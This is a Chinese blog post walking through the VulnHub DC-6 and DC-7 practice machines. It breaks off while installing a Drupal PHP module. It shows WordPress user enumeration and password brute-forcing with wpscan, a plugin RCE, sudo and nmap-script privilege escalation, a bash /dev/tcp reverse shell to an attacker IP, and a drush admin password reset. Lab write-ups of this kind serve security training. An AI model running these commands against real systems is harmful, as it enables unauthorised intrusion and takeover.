<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1.0"/><meta name="author" content="Regulus"/><meta name="copyright" content="Regulus"/><meta name="theme-color" content="#FFB347"/><meta name="format-detection" content="telephone=no"/><meta name="keywords" content="Hexo Theme MEOW"/><meta name="mobile-web-app-capable" content="yes"/><meta name="apple-mobile-web-app-capable" content="yes"/><meta name="apple-touch-fullscreen" content="yes"/><meta name="application-name" content="vulnhub_DC通关2 | Mei的小窝"/><meta name="apple-mobile-web-app-title" content="vulnhub_DC通关2 | Mei的小窝"/><meta name="apple-mobile-web-app-status-bar-style" content="#FFB347"/><link rel="canonical" href="http://example.com/2026/04/17/vulnhub-DC通关2/"/><meta name="description" content="vulnhub_DC(6-9)通关DC-6开启靶机之后，访问ip发现跳转到一个域名，和DC-2的套路一样，直接改 C:\Windows\System32\drivers\etc\hosts，添加192.168.164.135 wordy就可以访问到，然后发现是wordpress框架   直接使用wpscan进行扫描一下用户 1wpscan --url http:&#x2F;&#x2F;wordy&#x2F; -e u  ...">
<meta property="og:type" content="article">
<meta property="og:title" content="vulnhub_DC通关2 | Mei的小窝">
<meta property="og:url" content="http://example.com/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/index.html">
<meta property="og:site_name" content="Mei的小窝">
<meta property="og:description" content="vulnhub_DC(6-9)通关DC-6开启靶机之后，访问ip发现跳转到一个域名，和DC-2的套路一样，直接改 C:\Windows\System32\drivers\etc\hosts，添加192.168.164.135 wordy就可以访问到，然后发现是wordpress框架   直接使用wpscan进行扫描一下用户 1wpscan --url http:&#x2F;&#x2F;wordy&#x2F; -e u  ...">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/assets/images/Hexo-Theme-MEOW.png">
<meta property="article:published_time" content="2026-04-17T09:14:23.000Z">
<meta property="article:modified_time" content="2026-04-28T07:38:19.882Z">
<meta property="article:author" content="Regulus">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/assets/images/Hexo-Theme-MEOW.png"><meta name="robots" content="index,follow"/><meta name="googlebot" content="index,follow"/><meta name="revisit-after" content="1 days"/><title>vulnhub_DC通关2 | Mei的小窝</title><link rel="shortcut icon" href="/assets/images/Hexo-Theme-MEOW.ico"><link rel="preconnect" href="/assets"/><link rel="preconnect" href="assets"/>
<link rel="stylesheet" href="/css/style.css">
<link rel="prefetch" href="/"/><link rel="prefetch" href="/archives"/><link rel="prefetch" href="/tags"/><meta name="generator" content="Hexo 7.3.0"></head><body bg-style="none"><header><div id="navbar"><div id="nav-info"><a id="site-icon" href="/" title="主页"><img src="/assets/images/Hexo-Theme-MEOW.png" alt="Logo"/></a><a id="site-name" href="/" title="主页"><div>Mei的小窝</div><img src="/assets/images/svg/uc/uc-home.svg" class="icon noview" alt="Icon"></a></div><div id="nav-menu"><div class="menu-item"><a href="javascript:void(0);"><img src="/assets/images/svg/uc/uc-article.svg" class="icon noview" alt="Icon"><span>文章</span></a><ul class="sub-menu-item"><li><a href="/archives"><img src="/assets/images/svg/uc/uc-archive.svg" class="icon noview" alt="Icon"><span>归档</span></a></li><li><a href="/categories"><img src="/assets/images/svg/uc/uc-category.svg" class="icon noview" alt="Icon"><span>分类</span></a></li><li><a href="/tags"><img src="/assets/images/svg/uc/uc-tag.svg" class="icon noview" alt="Icon"><span>标签</span></a></li><li><a href="/about"><img src="/assets/images/svg/uc/uc-about.svg" class="icon noview" alt="Icon"><span>关于</span></a></li></ul></div></div><div id="nav-function"><div id="search-btn"><a href="javascript:void(0);" title="搜索" accesskey="s"><img src="/assets/images/svg/uc/uc-search.svg" class="icon noview" alt="Icon"><span>搜索</span></a></div><div id="menu-btn"><a href="javascript:void(0);" title="打开菜单"><img src="/assets/images/svg/uc/uc-menu.svg" class="icon noview" alt="Icon"></a></div></div></div></header><div id="menu-aside"><div id="menu-aside-container"><div id="menu-aside-info"><a href="/" title="主页"><img src="/assets/images/Hexo-Theme-MEOW.png" alt="Logo"/></a><a href="/" title="主页">Mei的小窝</a></div><div class="menu-aside-item"><a href="javascript:void(0);"><img src="/assets/images/svg/uc/uc-article.svg" class="icon noview" alt="Icon"><span>文章</span></a><ul class="menu-aside-sub-item"><li><a href="/archives"><img src="/assets/images/svg/uc/uc-archive.svg" class="icon noview" alt="Icon"><span>归档</span></a></li><li><a href="/categories"><img src="/assets/images/svg/uc/uc-category.svg" class="icon noview" alt="Icon"><span>分类</span></a></li><li><a href="/tags"><img src="/assets/images/svg/uc/uc-tag.svg" class="icon noview" alt="Icon"><span>标签</span></a></li><li><a href="/about"><img src="/assets/images/svg/uc/uc-about.svg" class="icon noview" alt="Icon"><span>关于</span></a></li></ul></div><hr/></div></div><main><div class="banner"><div class="banner-info"><div class="banner-avatar"><img src="/assets/images/Hexo-Theme-MEOW.png" alt="Avatar"/></div><div class="banner-title">「 Mei的小窝 」</div></div></div><div class="post-container"><div class="post-main"><div class="post-content"><h1 class="post-title">vulnhub_DC通关2</h1><div class="post-author"><span>作者: Regulus</span></div><div class="post-meta"><div class="post-info"><div class="post-date"><div class="post-pubdate"><img src="/assets/images/svg/ta/ta-pubdate.svg" class="icon noview" alt="Icon"><span>发表于2026-04-17</span></div><div class="post-update"><img src="/assets/images/svg/ta/ta-update.svg" class="icon noview" alt="Icon"><span>更新于2026-04-28</span></div></div><div class="post-read"><div class="post-wordcount"><img src="/assets/images/svg/ta/ta-write.svg" class="icon noview" alt="Icon"><span>总字数: 3.2k字</span></div><div class="post-readtime"><img src="/assets/images/svg/ta/ta-time.svg" class="icon noview" alt="Icon"><span>阅读时长: 10分钟</span></div><div class="post-pageview"><img src="/assets/images/svg/ta/ta-fire.svg" class="icon noview" alt="Icon"><span>访问量: </span><span id="vercount_value_page_pv"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none"  stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M12 6l0 -3" /><path d="M16.25 7.75l2.15 -2.15" /><path d="M18 12l3 0" /><path d="M16.25 16.25l2.15 2.15" /><path d="M12 18l0 3" /><path d="M7.75 16.25l-2.15 2.15" /><path d="M6 12l-3 0" /><path d="M7.75 7.75l-2.15 -2.15" /></svg></span></div></div></div><div class="post-attribute"></div></div><div class="post markdown" indent="false"><h1 id="vulnhub-DC-6-9-通关"><a href="#vulnhub-DC-6-9-通关" class="headerlink" title="vulnhub_DC(6-9)通关"></a>vulnhub_DC(6-9)通关</h1><h2 id="DC-6"><a href="#DC-6" class="headerlink" title="DC-6"></a>DC-6</h2><p>开启靶机之后，访问ip发现跳转到一个域名，和DC-2的套路一样，直接改</p>
<p><code>C:\Windows\System32\drivers\etc\hosts</code>，添加<code>192.168.164.135 wordy</code>就可以访问到，然后发现是wordpress框架</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260423210629192.png" class title="image-20260423210629192">

<p>直接使用wpscan进行扫描一下用户</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http://wordy/ -e u</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><code>-e</code>是为了探测除框架基础信息以外的更多的信息</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260423211929884.png" class title="image-20260423211929884">

<p>扫描出来好几个用户，并发现wordpress版本为5.1.1。</p>
<p>然后在题目描述<code>https://www.vulnhub.com/entry/dc-6,315/</code>中发现了提示我们需要使用rockyou的k01部分去进行密码爆破</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260423212524578.png" class title="image-20260423212524578">

<p>先将指定密码提取出来</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> /usr/share/wordlists/rockyou.txt | grep k01 &gt; passwords.txt</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>继续使用wpscan爆破各个用户的密码，将5个用户名写入username.txt中</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http://wordy -U username.txt -P passwords.txt</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>只发现一个用户</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260423213519481.png" class title="image-20260423213519481">

<p> 在<code>http://wordy/wp-login.php</code>中登录<code>mark helpdesk01</code>进入后台</p>
<p>尝试搜一下wordpress 5.1.1的漏洞，然后发现本体没有什么直接进行RCE的漏洞。主要漏洞在于其各种插件</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260423214859329.png" class title="image-20260423214859329">

<p>发现靶场装了Activity monitor这个插件，搜索发现存在RCE漏洞，至于怎么知道这个插件存在漏洞，插件不像一个cms系统一样可以简单获取到版本号，我们只能看见就试着打一下打掉了就有漏洞。</p>
<p>继续使用searchsploit去搜索漏洞</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">searchsploit activity monitor</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>发现有两个漏洞</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260423215909653.png" class title="image-20260423215909653">

<p>我使用python那个RCE漏洞，直接拿到shell。</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260423220324820.png" class title="image-20260423220324820">

<p>但是发现这个漏洞好像有挺大的问题，这个代码拿到的shell是命令执行每次只能执行一个命令不能持续性的连接，然后我就不能执行那些cd su这些持续性的命令，然后也不能反弹shell，写入木马也没有权限，只能尝试另外一个漏洞了。</p>
<p>另外一个使用html代替了requests库，我们修改html代码，指向我们的靶机和kali</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424110928123.png" class title="image-20260424110928123">

<p>然后点击request发现没有反应，前端有长度限制，我们只能自己抓包改</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424111102539.png" class title="image-20260424111102539">

<p>点击lookup，修改ip为我们的命令</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424111508439.png" class title="image-20260424111508439">

<p>拿到shell</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424111620551.png" class title="image-20260424111620551">

<p>我们去查看home目录下有什么信息，在<code>/home/mark/stuff/things-to-do.txt</code>中发现提示</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424112021560.png" class title="image-20260424112021560">

<p>提示新增了一个用户，graham并给了密码，<code>graham - GSo7isUM1D4</code>登录用户。</p>
<p>但是还是普通用户需要进行提权</p>
<p>find命令没有找到可以利用的命令</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424112817339.png" class title="image-20260424112817339">

<p>有用户密码，看下sudo可以执行的命令</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424122232573.png" class title="image-20260424122232573">

<p>有一个备份sh文件可以执行然后sudo不需要密码，虽然有了graham的密码。</p>
<p>查看一下这个sh发现是一个简单的解压缩命令没有什么可以利用的，但是我们可以尝试切换用户。</p>
<p>因为不需要密码，使用sudo以jens的身份运行<code>/bin/bash</code>即可在用户jens下开启一个shell。</p>
<p>修改backups.sh</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&#x27;/bin/bash&#x27;</span> &gt;&gt; /home/jens/backups.sh</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>然后以jens的身份去执行sh文件开启shell</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> -u jens /home/jens/backups.sh</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>成功开启jens的shell</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424124250952.png" class title="image-20260424124250952">

<p>然后<code>sudo -l</code>发现jens可以无密执行nmap</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424124431123.png" class title="image-20260424124431123">

<p>有root权限应该就是使用nmap去提权，看了题解是利用nmap可以执行脚本的特性去开启一个shell</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> /tmp</span><br><span class="line"><span class="built_in">echo</span> <span class="string">&#x27;os.execute(&quot;/bin/sh&quot;)&#x27;</span> &gt; getShell</span><br><span class="line"><span class="built_in">sudo</span>  nmap  --script=getShell</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>提权成功</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424125801946.png" class title="image-20260424125801946">

<p>root目录下拿flag</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424125916799.png" class title="image-20260424125916799">





<h2 id="DC-7"><a href="#DC-7" class="headerlink" title="DC-7"></a>DC-7</h2><p>打开靶场是经典的Drup cms系统</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424141638296.png" class title="image-20260424141638296">

<p>然后这次吸取教训，先去看一下靶场提示</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424142752779.png" class title="image-20260424142752779">

<p>提示我们大多数时候暴力破解不会成功</p>
<p>看了题解之后发现这是作者在页脚上留下的一个提示</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424143315285.png" class title="image-20260424143315285">

<p>直接在浏览器中搜索第一个就是github上的项目</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424143429143.png" class title="image-20260424143429143">

<p>进入我们可以在config.php中看见用户名和密码，虽然是mysql的但是可以尝试一下登录</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424143540008.png" class title="image-20260424143540008">

<p>尝试登录</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">dc7user</span><br><span class="line">MdR3xOgB7#dW</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>发现ssh可以用这个账号连接</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424144153896.png" class title="image-20260424144153896">

<p>反弹shell到kali上</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -i &gt;&amp; /dev/tcp/192.168.164.129/4444 0&gt;&amp;1</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>然后随便执行一个命令提示我们有新邮件，直接<code>cat /var/mail/dc7user</code></p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424195310728.png" class title="image-20260424195310728">

<p>这个邮件是Cron的一个定时任务，会由root定期执行backups.sh文件。</p>
<p>cat一下发现是一个解压命令，但是只有root和www-data权限才能对该sh文件进行编辑，但是看见导入了一个sql文件</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424200831153.png" class title="image-20260424200831153">

<p>其中有两个没有见过的命令drush</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#drush是专门用来管理Drupal的命令，相当于Drupal的shell</span></span><br><span class="line"><span class="comment">#运行drush需要在网站根目录运行</span></span><br><span class="line"><span class="built_in">cd</span> /var/www/html</span><br><span class="line">drush user-password admin --password=<span class="string">&quot;admin&quot;</span></span><br><span class="line"><span class="comment">#改admin用户密码为admin</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>修改成功</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424201738970.png" class title="image-20260424201738970">

<p>使用账号成功登录admin</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424202535912.png" class title="image-20260424202535912">

<p>但是拿到admin账号也没有什么用，没有在这个Drupal中发现什么漏洞。</p>
<p>然后回到首页发现首页那段提示字符串既然是可以被编辑的，结合提示信息猜测这里存在文件包含漏洞。</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424204124903.png" class title="image-20260424204124903">

<p>尝试写入php木马，但是发现是被当作html输出</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424204324704.png" class title="image-20260424204324704">

<p>然后这个Drupal框架也没有发现什么漏洞，看了题解发现没有漏洞我们可以创造漏洞，写入的php代码会作为前端代码输出</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424204832429.png" class title="image-20260424204832429">

<p>但是发现可以选择输出的不同种类，然后Drupal有一个插件可以输出这些为php代码<code>https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz</code></p>
<p>我们找到通过url下载插件的地方</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424205143337.png" class title="image-20260424205143337">

<p>Extend选择安装install new module进入界面下载插件</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424205240671.png" class title="image-20260424205240671">

